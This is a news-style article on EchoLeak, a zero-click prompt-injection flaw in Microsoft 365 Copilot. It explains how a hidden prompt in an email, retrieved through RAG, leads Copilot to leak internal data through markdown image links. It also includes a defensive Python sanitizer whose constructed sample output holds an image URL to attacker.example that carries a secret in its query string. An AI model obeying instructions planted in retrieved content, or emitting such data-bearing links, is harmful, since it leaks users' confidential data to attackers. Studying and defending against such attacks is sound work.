
AI Security Alarm: Microsoft Copilot Vulnerability Exposed Sensitive Data via Zero-Click Email Exploit
The vulnerability was discovered by Aim Labs in January 2025 and promptly reported to Microsoft. It was fixed server-side in May, meaning users didn't need to take any action themselves. Microsoft emphasized that no customers were affected, and there's no evidence that the flaw was exploited in real-world scenarios.
Still, the discovery marks a historic moment, as EchoLeak is believed to be the first-ever zero-click vulnerability targeting a large language model (LLM)-based assistant.
How EchoLeak Worked
Microsoft 365 Copilot integrates across Office applications like Word, Excel, Outlook, and Teams. It utilizes AI, powered by OpenAI's models and Microsoft Graph, to help users by analyzing data and generating content based on internal emails, documents, and chats.
EchoLeak took advantage of this feature. Here's a breakdown of the exploit process:
A malicious email is crafted to look legitimate but contains a hidden prompt embedded in the message.
When a user later asks Copilot a related question, the AI, using Retrieval-Augmented Generation (RAG), pulls in the malicious email thinking it's relevant.
The concealed prompt is then activated, instructing Copilot to leak internal data through a link or image.
As the email is displayed, the link is automatically accessed by the browser, silently transferring internal data to the attacker's server.
Researchers noted that certain markdown image formats used in the email could trigger browsers to send automatic requests, enabling the leak. While Microsoft's Content Security Policies (CSP) block most unknown web requests, services like Teams and SharePoint are considered trusted by default—offering a way in for attackers.
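The exfiltration step described above relies on the rendering surface fetching an image URL that the model was induced to emit. The defensive control that follows is an added example, not code from the Aim Labs report or from any Microsoft component: an output-side sanitizer placed between an LLM assistant and the place where its markdown is rendered. It resolves both inline and reference-style markdown images, allows images only from an allowlisted host, and refuses any URL that carries a query string or fragment, since that is where retrieved content would be carried out. The allowlist host, the function names and the sample assistant output are constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist: hosts from which rendered assistant output may load images.
ALLOWED_IMAGE_HOSTS = {"static.example-intranet.test"}

# Inline image: ![alt](url "optional title")
INLINE_IMG = re.compile(r'!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')
# Reference-style image: ![alt][ref] or ![alt][]
REF_IMG = re.compile(r'!\[([^\]]*)\]\[([^\]]*)\]')
# Reference definition line: [ref]: url "optional title"
REF_DEF = re.compile(r'^\s{0,3}\[([^\]]+)\]:\s*<?(\S+?)>?(?:\s+"[^"]*")?\s*$', re.MULTILINE)


def image_url_is_safe(url: str) -> bool:
    """Policy: https only, allowlisted host only, and no query string or fragment.

    A host allowlist alone is not enough when trusted services are exempted
    from CSP, so a data-bearing URL is rejected even on an allowed host.
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if parts.hostname not in ALLOWED_IMAGE_HOSTS:
        return False
    if parts.query or parts.fragment:
        return False
    return True


def sanitize_llm_markdown(text: str) -> tuple[str, list[str]]:
    """Return (sanitized markdown, list of blocked image URLs).

    Every image that fails the policy is replaced by a visible placeholder so
    the reader can see that something was removed rather than silently lost.
    """
    blocked: list[str] = []
    # Resolve reference definitions first so ![alt][ref] can be checked.
    definitions = {m.group(1).lower(): m.group(2) for m in REF_DEF.finditer(text)}

    def replace_inline(m: re.Match) -> str:
        alt, url = m.group(1), m.group(2)
        if image_url_is_safe(url):
            return m.group(0)
        blocked.append(url)
        return f"[image removed: {alt}]"

    def replace_reference(m: re.Match) -> str:
        alt = m.group(1)
        ref = m.group(2) or alt          # ![alt][] uses the alt text as the label
        url = definitions.get(ref.lower())
        if url is not None and image_url_is_safe(url):
            return m.group(0)
        blocked.append(url if url is not None else f"<unresolved reference {ref}>")
        return f"[image removed: {alt}]"

    out = INLINE_IMG.sub(replace_inline, text)
    out = REF_IMG.sub(replace_reference, out)
    # Drop definition lines that fail the policy so nothing can resolve to them later.
    out = REF_DEF.sub(lambda m: m.group(0) if image_url_is_safe(m.group(2)) else "", out)
    return out, blocked


# Constructed sample of assistant output: one legitimate chart, one inline image
# smuggling text in its query string, and one reference-style image to an outside host.
SAMPLE_OUTPUT = (
    "Summary of the Q3 plan.\n\n"
    "![chart](https://static.example-intranet.test/q3.png)\n\n"
    "![](https://attacker.example/x.png?d=CONSTRUCTED-SECRET)\n\n"
    "![logo][lg]\n\n"
    "[lg]: https://attacker.example/l.png\n"
)

if __name__ == "__main__":
    clean, removed = sanitize_llm_markdown(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", removed)
```

The sanitizer is deliberately strict in one direction: it removes images rather than trying to rewrite their URLs, and it logs what it removed so the event can feed detection (a burst of blocked image URLs in assistant output is a useful signal on its own). Reference-style definitions are resolved before checking because a reference image looks harmless until its definition line is consulted.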
The Bigger Concern: LLM Scope Violations
The vulnerability isn't just a technical bug—it signals the emergence of a new category of threats called LLM Scope Violations. These occur when language models unintentionally expose data through their internal processing mechanisms, even without direct user commands.
'This attack chain showcases a new exploitation technique... by leveraging internal model mechanics,' Aim Labs stated in their report. They also cautioned that similar risks could be present in other RAG-based AI systems, not just Microsoft Copilot.
Microsoft assigned the flaw the ID CVE-2025-32711 and categorized it as critical. The company reassured users that the issue has been resolved and that there were no known incidents involving the vulnerability.
Despite the fix, the warning from researchers is clear: 'The increasing complexity and deeper integration of LLM applications into business workflows are already overwhelming traditional defences,' their report concludes.
As AI agents become more integrated into enterprise systems, EchoLeak is a stark reminder that security in the age of intelligent software needs to evolve just as fast as the technology itself.
